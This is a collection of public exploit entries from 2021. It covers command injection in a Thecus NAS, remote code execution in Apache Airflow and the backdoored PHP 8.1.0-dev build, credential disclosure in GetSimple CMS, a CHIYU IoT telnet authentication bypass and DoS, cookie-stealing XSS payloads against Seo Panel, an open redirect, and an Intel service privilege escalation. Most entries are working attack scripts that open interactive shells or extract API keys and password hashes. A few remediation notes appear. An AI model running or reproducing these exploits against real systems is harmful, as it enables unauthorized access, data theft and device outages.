# Exploit Title: Thecus N4800Eco Nas Server Control Panel - Comand Injection # Date: 01/06/2021 # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: http://www.thecus.com/ # Software Link: http://www.thecus.com/product.php?PROD_ID=83 # Version: N4800Eco # Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection #!/usr/bin/python3 import requests import sys import urllib3 # To fix SSL error that occurs when the script is started. # 1- Open /etc/ssl/openssl.cnf file # At the bottom of the file: # [system_default_sect] # MinProtocol = TLSv1.2 # CipherString = DEFAULT@SECLEVEL=2 # 2- Set value of MinProtocol as TLSv1.0 def readResult(s, target): d = { "fun": "setlog", "action": "query", "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]' } url = "http://" + target + "/adm/setmain.php" resultReq = s.post(url, data=d, verify=False) dict = resultReq.text.split() print("[+] Reading system log...\n") print(dict[5:8]) #change this range to read whole output of the command def delUser(s, target, command): d = { "action": "delete", "username": "$("+command+")" } url = "http://" + target + "/adm/setmain.php?fun=setlocaluser" delUserReq = s.post(url, data=d, allow_redirects=False, verify=False) if 'Local User remove succeeds' in delUserReq.text: print('[+] %s command was executed successfully' % command) else: print('[-] %s command was not executed!' %command) sys.exit(1) readResult(s, target) def addUser(s, target, command): d = {'batch_content': '%24('+command+')%2C22222%2C9999'} url = "http://" + target + "/adm/setmain.php?fun=setbatch" addUserReq = s.post(url, data=d, allow_redirects=False, verify=False) if 'Users and groups were created successfully.' in addUserReq.text: print('[+] Users and groups were created successfully') else: print('[-] Users and groups were not created') sys.exit(1) delUser(s, target, command) def login(target, username, password, command=None): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) s = requests.Session() d = { "&eplang": "english", "p_pass": password, "p_user": username, "username": username, "pwd": password, "action": "login", "option": "com_extplorer" } url = "http://" + target + "/adm/login.php" loginReq = s.post(url, data=d, allow_redirects=False, verify=False) if '"success":true' in loginReq.text: print('[+] Authentication successful') elif '"success":false' in loginReq.text: print('[-] Authentication failed!') sys.exit(1) else: print('[-] Something went wrong!') sys.exit(1) addUser(s, target, command) def main(args): if len(args) != 5: print("usage: %s targetIp:port username password command" % (args[0])) print("Example 192.168.1.13:80 admin admin id") sys.exit(1) login(target=args[1], username=args[2], password=args[3], command=args[4]) if __name__ == "__main__": main(args=sys.argv)

# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution # Date: 2021-06-02 # Exploit Author: Pepe Berba # Vendor Homepage: https://airflow.apache.org/ # Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html # Version: <= 1.10.10 # Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml) # CVE : CVE-2020-11978 # # This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow # This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default. # Together, potentially allows unauthenticated RCE to Airflow # # Repo: https://github.com/pberba/CVE-2020-11978 # More information can be found here: # https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E # https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E # # Remediation: # For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set. # For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG. # # Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 "touch test" import argparse import requests import sys import time def create_dag(url, cmd): print('[+] Checking if Airflow Experimental REST API is accessible...') check = requests.get('{}/api/experimental/test'.format(url)) if check.status_code == 200: print('[+] /api/experimental/test returned 200' ) else: print('[!] /api/experimental/test returned {}'.format(check.status_code)) print('[!] Airflow Experimental REST API not be accessible') sys.exit(1) check_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url)) if check_task.status_code != 200: print('[!] Failed to find the example_trigger_target_dag.bash_task') print('[!] Host isn\'t vunerable to CVE-2020-11978') sys.exit(1) elif 'dag_run' in check_task.json()['env']: print('[!] example_trigger_target_dag.bash_task is patched') print('[!] Host isn\'t vunerable to CVE-2020-11978') sys.exit(1) print('[+] example_trigger_target_dag.bash_task is vulnerable') unpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url)) if unpause.status_code != 200: print('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded') sys.exit(1) else: print('[+] example_trigger_target_dag was enabled') print('[+] Creating new DAG...') res = requests.post( '{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url), json={ 'conf': { 'message': '"; {} #'.format(cmd) } } ) if res.status_code == 200: print('[+] Successfully created DAG') print('[+] "{}"'.format(res.json()['message'])) else: print('[!] Failed to create DAG') sys.exit(1) wait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format( url = url, execution_date=res.json()['execution_date'] ) start_time = time.time() print('[.] Waiting for the scheduler to run the DAG... This might take a minute.') print('[.] If the bash task is never queued, then the scheduler might not be running.') while True: time.sleep(10) res = requests.get(wait_url) status = res.json()['state'] if status == 'queued': print('[.] Bash task queued...') elif status == 'running': print('[+] Bash task running...') elif status == 'success': print('[+] Bash task successfully ran') break elif status == 'None': print('[-] Bash task is not yet queued...'.format(status)) else: print('[!] Bash task was {}'.format(status)) sys.exit(1) return 0 def main(): arg_parser = argparse.ArgumentParser() arg_parser.add_argument('url', type=str, help="Base URL for Airflow") arg_parser.add_argument('command', type=str) args = arg_parser.parse_args() create_dag( args.url, args.command ) if __name__ == '__main__': main()

# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure # Date 01.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: http://get-simple.info/ # Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip # Version: 3.3.4 # CVE: CVE-2014-8722 # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit ''' Description: GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to (1) data/users/<username>.xml, (2) backups/users/<username>.xml.bak, (3) data/other/authorization.xml, or (4) data/other/appid.xml. ''' ''' Import required modules: ''' import sys import requests ''' User-Input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] cmspath = sys.argv[3] print('') username = input("Do you know the username? Y/N: ") if username == 'Y': print('') username = True username_string = input('Please enter the username: ') else: print('') username = False print('No problem, you will still get the API key') ''' Get Api-Key: ''' url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml' header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0" } x = requests.get(url, headers=header).text start = x.find('[') + 7 end = x.find(']') api_key = x[start:end] print('') print('Informations:') print('') print('[*] API Key: ' + api_key) if username: ''' Get Email and Passwordhash: ''' url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml' header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0" } x = requests.get(url, headers=header).text start = x[x.find('PWD>'):] passwordhash = start[start.find('>') +1 :start.find('<')] print('[*] Hashed Password: ' + passwordhash) start = x[x.find('EMAIL>'):] email = start[start.find('>') + 1 : start.find('<')] print('[*] Email: ' + email) print('')

# Exploit Title: Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path # Date: 06-01-2021 # Exploit Author: Geovanni Ruiz # Vendor Homepage: https://www.intel.com # Software Version: 01.00.1080.0 # File Version: 1.00.1080.0 # Tested on: Microsoft® Windows 10 Home Single Language 10.0.19042 x64 es # Vulnerability Type: Unquoted Service Path # 1. To find the unquoted service path vulnerability C:\>wmic service where 'name like "%IntelAudioService%"' get name, displayname, pathname, startmode, startname DisplayName Name PathName StartMode StartName Intel(R) Audio Service IntelAudioService C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe Auto LocalSystem # 2. To check service info: C:\>sc qc "IntelAudioService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: IntelAudioService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Intel(R) Audio Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # 3. Exploit: To exploit this vulnerability an attacker requires drop a malicious executable into the service path undetected by the OS in order to gain SYSTEM privileges.

# Exploit Title: Products.PluggableAuthService 2.6.0 - Open Redirect # Exploit Author: Piyush Patil # Affected Component: Pluggable Zope authentication/authorization framework # Component Link: https://pypi.org/project/Products.PluggableAuthService/ # Version: < 2.6.1 # CVE: CVE-2021-21337 # Reference: https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p44j-xrqg-4xrr --------------------------Proof of Concept----------------------- 1- Goto https://localhost/login 2- Turn on intercept and click on the login 3- Change "came_from" parameter value to https://attacker.com 4- User will be redirected to an attacker-controlled website. Fix: pip install "Products.PluggableAuthService>=2.6.1"

# Exploit Title: Seo Panel 4.8.0 - 'search_name' Reflected XSS # Date: 21-03-2021 # Exploit Author: Piyush Patil # Vendor Homepage: https://www.seopanel.org/ # Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0 # Version: Seo Panel 4.8.0 # Tested on: Windows 10 and Kali # CVE : CVE-2021-28417 -Description: A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter. -Payload used: x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22 -Steps to reproduce: 1- Login to SEO admin panel 2- Add below line at the end: http://localhost/archive.php?from_time=2021-03-08&order_col=name&order_val=DESC&report_type=website-search-reports&search_name=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&sec=viewWebsiteSearchSummary&to_time=2021-03-09&website_id=http%3a%2f%2fwww.example.com 3- Hover your mouse near to "CTR" field

# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution # Date: 23 may 2021 # Exploit Author: flast101 # Vendor Homepage: https://www.php.net/ # Software Link: # - https://hub.docker.com/r/phpdaily/php # - https://github.com/phpdaily/php # Version: 8.1.0-dev # Tested on: Ubuntu 20.04 # References: # - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a # - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md """ Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/ Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py Contact: [email protected] An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. The following exploit uses the backdoor to provide a pseudo shell ont the host. """ #!/usr/bin/env python3 import os import re import requests host = input("Enter the full host url:\n") request = requests.Session() response = request.get(host) if str(response) == '<Response [200]>': print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.") try: while 1: cmd = input("$ ") headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "User-Agentt": "zerodiumsystem('" + cmd + "');" } response = request.get(host, headers = headers, allow_redirects = False) current_page = response.text stdout = current_page.split('<!DOCTYPE html>',1) text = print(stdout[0]) except KeyboardInterrupt: print("Exiting...") exit else: print("\r") print(response) print("Host is not available, aborting...") exit

# Exploit Title: Seo Panel 4.8.0 - 'category' Reflected XSS # Date: 22-03-2021 # Exploit Author: Piyush Patil # Vendor Homepage: https://www.seopanel.org/ # Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0 # Version: Seo Panel 4.8.0 # Tested on: Windows 10 and Kali # CVE : CVE-2021-28418 -Description: A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter. -Payload used: x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22 -Steps to reproduce: 1- Login to SEO admin panel 2- Visit: http://localhost/settings.php?category=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22 3- Hover your mouse to "Cancel" field

# Exploit Title: Seo Panel 4.8.0 - 'from_time' Reflected XSS # Date: 23-03-2021 # Exploit Author: Piyush Patil # Vendor Homepage: https://www.seopanel.org/ # Version: Seo Panel 4.8.0 # Tested on: Windows 10 and Kali # CVE : CVE-2021-28420 -Description: A cross-site scripting (XSS) issue in Seo Panel 4.8.0 allows remote attackers to inject JavaScript via alerts.php and the "from_time" parameter. -Payload used: x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22 -Steps to reproduce: 1- Login to SEO admin panel 2- Visit: http://localhost/alerts.php?alert_category=general&from_time=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&keyword=&to_time=2021-03-11 3- Hover your mouse to "Period" field

# Exploit Title: CHIYU IoT Devices - 'Telnet' Authentication Bypass # Date: 01/06/2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html # Software Link: https://www.chiyu-tech.com/category-hardware.html # Version: BF-430, BF-431, BF-450M, and SEMAC - all firmware versions < June 2021 # Tested on: BF-430, BF-431, BF-450M, and SEMAC # CVE: CVE-2021-31251 # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks """ Description: Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions. CVE ID: CVE-2021-31251 CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251 """ #!/usr/bin/env python3 # usage: python3 exploit.py IP import socket import time import sys HOST = sys.argv[1] PORT = 23 socket.setdefaulttimeout(10) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect = s.connect_ex((HOST, PORT)) try: print("[+] Try to connect...\n") time.sleep(1) s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18") s.recv(1024).strip() s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18") s.recv(1024).strip() s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18") result = s.recv(1024).strip() if result != b'\xff\xfe\x01': s.send(b"\x09") result = s.recv(1024).strip() if connect == 0 and "sername" not in str(result): if b"\xff\xfe\x01" == result: print("Connected! ;)\ntype: \"help\"\n\n") while 1: cmd = input("(CHIYU pwnShell:) $ ") body = cmd+"\n" s.send(body.encode('utf-8', 'ignore')) result = s.recv(1024).decode('utf8', 'ignore') if not len(result): print("[+] CHIYU device not available, try again ... (terminating)") s.close() break print(result.strip('CMD>')) b = "\n" s.send(b.encode('utf-8', 'ignore')) result = s.recv(1024).decode() print(result.strip('CMD>')) except KeyboardInterrupt: print("\n[+] ^C Received, closing connection") s.close() except EOFError: print("\n[+] ^D Received, closing connection") s.close() except socket.error: print("[+] Unable to connect to CHIYU device.")

# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS) # Date: 01/06/2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html # Software Link: https://www.chiyu-tech.com/category-hardware.html # Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021 # Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC # CVE: CVE-2021-31642 # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device. CVE ID: CVE-2021-31642 CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642 Affected parameter: page=Component: if.cgi Payload: if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 ====HTTP request====== GET /if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: close Referer: http://127.0.0.1/AccLog.htm Cookie: fresh= Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to the CGI component (if.cgi) 3. Append the payload at the end of the vulnerable parameter (page) 4. Submit the request and observe payload execution Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.